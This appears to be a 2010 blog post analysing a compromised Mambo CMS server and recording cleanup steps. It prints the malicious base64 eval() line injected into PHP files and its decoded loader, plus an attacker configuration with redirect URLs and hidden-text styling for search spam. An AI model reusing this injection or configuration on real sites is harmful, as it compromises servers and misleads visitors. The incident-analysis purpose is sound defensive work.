Few days ago we realized that one of our client website is not working at all.  After short while we found that the site was probably hacked.

This is a server of our client which purpose is mainly to run older non maintained projects. There was also one old Mambo CMS website installation which apart from other plug-ins had installed TinyMCE wysiwyg editor.

The website we found not working had something strange include on top of each PHP file.

<?php /**/eval(base64_decode(‘aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy93ZWJzaXRlcy9zaXRlcy9hYnNpdGUuY29tL2h0bWwvY3AvY3BhaW50L21hbWJvdHMvZWRpdG9ycy9tb3NjZS9qc2NyaXB0cy90aW55X21jZS9wbHVnaW5zL2ZpbGVtYW5hZ2VyL0luc2VydEZpbGUvZG9jcy9lbi9pbWFnZXMvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==’)); ?>

After decompressing the statement I saw inclusion of this file verifying existence of some functions and running them, here is debased code

if(function_exists(‘ob_start’) && !isset($GLOBALS['mfsn'])){
$GLOBALS['mfsn']=’/websites/sites/html/cp/cpaint/mambots/editors/mosce/jscripts/tiny_mce/plugins/filemanager/InsertFile/docs/en/images/style.css.php’;
if(file_exists($GLOBALS['mfsn'])){
include_once($GLOBALS['mfsn']);
if(function_exists(‘gml’) && function_exists(‘dgobh’)){
ob_start(‘dgobh’);
}
}
}

As you can see the location of the file is inside filemanager plug-in of tinyMCE editor. As many people don’t realize filemanager or picture manager plugins come unsecured when installed and security must be configured or installed by developer. Unless this is done its serious hole to filesystem.

After analyzing it seems like data used by intruder is stored in files in the same folder as the main script is. Apart form 10k words dictionary there is also some swf movie  and I found also some config file which looks like this after decoding

dgqn = “nkht”
dgurl= http://umniktds.ws/in.cgi?24&parameter=$keyword&se=$se&seoref=%ref%&HTTP_REFERER=%self_url%&default_keyword=%kw%
dgsu = http://umniktds.ws/in.cgi?7&parameter=%kw%&HTTP_REFERER=%self_url%
dguh = http://nomsat24.net/;http://nssat4.com/;http://wplsat24.net/
dgid = 65fcd851-e2f2-a45c-e389-04e0daf71df6
ZGd0 = 2
cHJs = 1
st = <style>#wyfp {position:absolute;overflow:auto;height:0;width:0;}</style><font id=”wyfp”>
ed = </font>
lbp = 2
dgblo = 1
ZnJi = 0
dgsr  = 1
dgst = 24
fr = 0
a3dy = 1
dgtheme = “google_trends”
Z2M= = “”
Z2Q= = 30
bWw= = 50
c2Rs = 1
Z3o= = 0

In data stored there is also IP address in its own file 59.97.104.17|1274687317 which translates to Indian mobile operator Bharat Sanchar Nigam Limited.

There is also file with about 1000 IP addresses ranges list.

I decompiled main script which is encoded in base64 in recursion and split so many blocks. It took me a while to write parser to decode it. Source code is also compressed, all whitespace characters are stripped and all variable and function names as random strings. Difficult to read even after restoring some styling.  You can have a look source is  attached. From what I can see the script is doing HTTP requests or other port socket connections and has got exceptions in its behavior for search engine robots. The script is suspected to install viruses according to this report.

This thing seems to be enough clever to clean up after itself,  as I realized that entire working directory of the main hack script was cleared out. Don’t worry we’ve got s copy, you can download it from attachment if you are interested.

Some statistical data

we found more than 10 000 PHP files on this server injected with virus code

we found all files to be modified on 21 of April 2010. Main hack scripts modified on 27 of May 2010

main script is long about 3500 lines after restoring some styling

Attackers zipped source folder

Decoded a bit styled source code of php attack script

This is the suspected file
/websites/sites/absite.com/html/cp/cpaint/mambots/editors/mosce/jscripts/tiny_mce/plugins/filemanager/InsertFile/docs/en/images/style.css.php
Possibly copied over through unsecured imagemanager.

During our steps to make timesheet of holden jones this scritp with
other files in the folder disapeared.
I have a zipped copy of entire pascoe mambo CMS with original state
including removed files.
So this thing seems to be enough clever to clean up after itself, so
lets verify whether they haven't created backdoor somewhere.

For reference, this is what I have done on server. in chronological order:

1. found that holdenjohns timesheet application has got some strange
inclutions in php scripts:
<?php
/**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy93ZWJzaXRlcy9zaXRlcy9hYnNpdGUuY29tL2h0bWwvY3AvY3BhaW50L21hbWJvdHMvZWRpdG9ycy9tb3NjZS9qc2NyaXB0cy90aW55X21jZS9wbHVnaW5zL2ZpbGVtYW5hZ2VyL0luc2VydEZpbGUvZG9jcy9lbi9pbWFnZXMvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ=='));
?>
, followed up these and ended up on script mentioned above. That script
has got in it all malicious code I'll analyze later whether it was
loading anything else in the server.

2. I created tar.gz of holden_johnes directory. and copied that to
/home/stan/attack-28052010 folder

3. I created tar.gz of folder of /websites/site/pascoeinternational.com
and copied that to /home/stan/attack-28052010 folder

4. removed holden-johnes files (I couldn;t delete some cache in compiled
directory as I didn't have permissions to do so)

5. Martin copied over his local copy. There was one file havign the
malicious code included in his local copy also which was dated 9/4/2010.
this is oldest file so far we know that was modified by this.
HJ application started to work

6. I renamed /websites/sites/pascoeinternational.com to
/websites/sites/pascoeinternational.com.rem as I cannot delete the files.

7.  I renamed all other folders in /home/stan/sites/absite.com/html/cp/
with suffix ".hack" apart from timesheets_hj which is needed by client
and had been cleaned up.

Published by Stan Kuhn in: Security and anti-spam